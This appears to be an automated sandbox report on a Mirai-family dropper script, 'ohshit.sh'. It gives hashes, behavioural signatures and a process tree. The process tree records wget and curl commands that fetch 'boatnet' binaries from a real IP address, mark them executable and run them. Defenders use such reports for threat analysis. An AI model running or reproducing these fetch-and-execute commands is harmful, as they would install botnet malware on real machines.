Analysis

max time kernel: 59s
max time network: 61s
platform: ubuntu-22.04_amd64
resource: ubuntu2204-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
submitted: 31-08-2024 21:05
Static task: static1

Behavioral tasks (sample ohshit.sh in every task):
behavioral1: resource debian12-armhf-20240418-en
behavioral2: resource debian12-mipsel-20240729-en
behavioral3: resource debian9-armhf-20240611-en
behavioral4: resource debian9-mipsbe-20240611-en
behavioral5: resource debian9-mipsel-20240611-en
behavioral6: resource ubuntu1804-amd64-20240508-en
behavioral7: resource ubuntu2004-amd64-20240729-en
behavioral8: resource ubuntu2204-amd64-20240611-en
General

Target: ohshit.sh
Size: 2KB
MD5: fefdf2b7ece4d55bd47778b420f84011
SHA1: 2823096e0538910f9b57ff9bae007ec655520fc3
SHA256: 3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
SHA512: b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
Extracted
mirai
LZRD
Signatures

Executes dropped EXE (5 IoCs)
  ioc       pid   Process
  /tmp/WTF  1585  WTF
  /tmp/WTF  1594  WTF
  /tmp/WTF  1604  WTF
  /tmp/WTF  1613  WTF
  /tmp/WTF  1622  WTF

Modifies Watchdog functionality (1 TTPs, 10 IoCs)
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description                    ioc                  Process
  File opened for modification   /dev/watchdog        WTF
  File opened for modification   /dev/misc/watchdog   WTF
  File opened for modification   /dev/misc/watchdog   WTF
  File opened for modification   /dev/watchdog        WTF
  File opened for modification   /dev/misc/watchdog   WTF
  File opened for modification   /dev/watchdog        WTF
  File opened for modification   /dev/misc/watchdog   WTF
  File opened for modification   /dev/watchdog        WTF
  File opened for modification   /dev/misc/watchdog   WTF
  File opened for modification   /dev/watchdog        WTF

  resource                            yara_rule
  behavioral8/files/fstream-1.dat     upx

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder (1 TTPs, 10 IoCs)
  description                    ioc              Process
  File opened for modification   /sbin/watchdog   WTF
  File opened for modification   /bin/watchdog    WTF
  File opened for modification   /bin/watchdog    WTF
  File opened for modification   /bin/watchdog    WTF
  File opened for modification   /sbin/watchdog   WTF
  File opened for modification   /bin/watchdog    WTF
  File opened for modification   /sbin/watchdog   WTF
  File opened for modification   /bin/watchdog    WTF
  File opened for modification   /sbin/watchdog   WTF
  File opened for modification   /sbin/watchdog   WTF

Reads runtime system information (64 IoCs)
Reads data from /proc virtual filesystem.
  description: File opened for reading (all 64 entries)
  Process: WTF (all 64 entries)
  ioc (in the order reported): /proc/633/status, /proc/629/status, /proc/90/status, /proc/101/status, /proc/110/status, /proc/1243/status, /proc/1601/status, /proc/646/status, /proc/697/status, /proc/94/status, /proc/411/status, /proc/697/status, /proc/209/status, /proc/1197/status, /proc/987/status, /proc/697/status, /proc/1642/status, /proc/1657/status, /proc/405/status, /proc/1669/status, /proc/12/status, /proc/119/status, /proc/1451/status, /proc/1586/status, /proc/86/status, /proc/82/status, /proc/1077/status, /proc/1091/status, /proc/1199/status, /proc/1586/status, /proc/1159/status, /proc/1638/status, /proc/1091/status, /proc/102/status, /proc/871/status, /proc/1147/status, /proc/1077/status, /proc/96/status, /proc/1056/status, /proc/1607/status, /proc/1655/status, /proc/1665/status, /proc/13/status, /proc/95/status, /proc/1310/status, /proc/1666/status, /proc/4/status, /proc/1647/status, /proc/1675/status, /proc/1652/status, /proc/1662/status, /proc/835/status, /proc/1188/status, /proc/1249/status, /proc/98/status, /proc/1641/status, /proc/1243/status, /proc/1635/status, /proc/1652/status, /proc/609/status, /proc/224/status, /proc/705/status, /proc/1223/status, /proc/7/status

Writes file to tmp directory (10 IoCs)
Malware often drops required files in the /tmp directory.
  description                    ioc                   Process
  File opened for modification   /tmp/boatnet.x86      wget
  File opened for modification   /tmp/WTF              ohshit.sh
  File opened for modification   /tmp/boatnet.mips     wget
  File opened for modification   /tmp/boatnet.mips     curl
  File opened for modification   /tmp/boatnet.arc      wget
  File opened for modification   /tmp/boatnet.i468     curl
  File opened for modification   /tmp/boatnet.i686     curl
  File opened for modification   /tmp/boatnet.x86      curl
  File opened for modification   /tmp/boatnet.arc      curl
  File opened for modification   /tmp/boatnet.x86_64   wget
Processes

Process tree (child processes are indented under /tmp/ohshit.sh):

/tmp/ohshit.sh (PID 1570)
  command line: /tmp/ohshit.sh
  signatures: Writes file to tmp directory

  /usr/bin/wget (PID 1571)
    command line: wget http://94.156.71.225/hiddenbin/boatnet.x86
    signatures: Writes file to tmp directory

  /usr/bin/curl (PID 1582)
    command line: curl -O http://94.156.71.225/hiddenbin/boatnet.x86
    signatures: Writes file to tmp directory

  /usr/bin/cat (PID 1583)
    command line: cat boatnet.x86

  /usr/bin/chmod (PID 1584)
    command line: chmod +x WTF boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t

  /tmp/WTF (PID 1585)
    command line: ./WTF
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1589)
    command line: wget http://94.156.71.225/hiddenbin/boatnet.mips
    signatures: Writes file to tmp directory

  /usr/bin/curl (PID 1591)
    command line: curl -O http://94.156.71.225/hiddenbin/boatnet.mips
    signatures: Writes file to tmp directory

  /usr/bin/chmod (PID 1593)
    command line: chmod +x WTF boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t

  /tmp/WTF (PID 1594)
    command line: ./WTF
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1598)
    command line: wget http://94.156.71.225/hiddenbin/boatnet.arc
    signatures: Writes file to tmp directory

  /usr/bin/curl (PID 1600)
    command line: curl -O http://94.156.71.225/hiddenbin/boatnet.arc
    signatures: Writes file to tmp directory

  /usr/bin/chmod (PID 1603)
    command line: chmod +x WTF boatnet.arc boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t

  /tmp/WTF (PID 1604)
    command line: ./WTF
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1608)
    command line: wget http://94.156.71.225/hiddenbin/boatnet.i468

  /usr/bin/curl (PID 1610)
    command line: curl -O http://94.156.71.225/hiddenbin/boatnet.i468
    signatures: Writes file to tmp directory

  /usr/bin/chmod (PID 1612)
    command line: chmod +x WTF boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t

  /tmp/WTF (PID 1613)
    command line: ./WTF
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1617)
    command line: wget http://94.156.71.225/hiddenbin/boatnet.i686

  /usr/bin/curl (PID 1619)
    command line: curl -O http://94.156.71.225/hiddenbin/boatnet.i686
    signatures: Writes file to tmp directory

  /usr/bin/chmod (PID 1621)
    command line: chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t

  /tmp/WTF (PID 1622)
    command line: ./WTF
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Writes file to system bin folder; Reads runtime system information

  /usr/bin/wget (PID 1626)
    command line: wget http://94.156.71.225/hiddenbin/boatnet.x86_64
    signatures: Writes file to tmp directory
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 36KB
MD5: ba2cb5b8715ba94c39e24e75a34d0ea0
SHA1: 7182bf3b0e14e5224e741c15174c6e93f00df444
SHA256: 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA512: 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d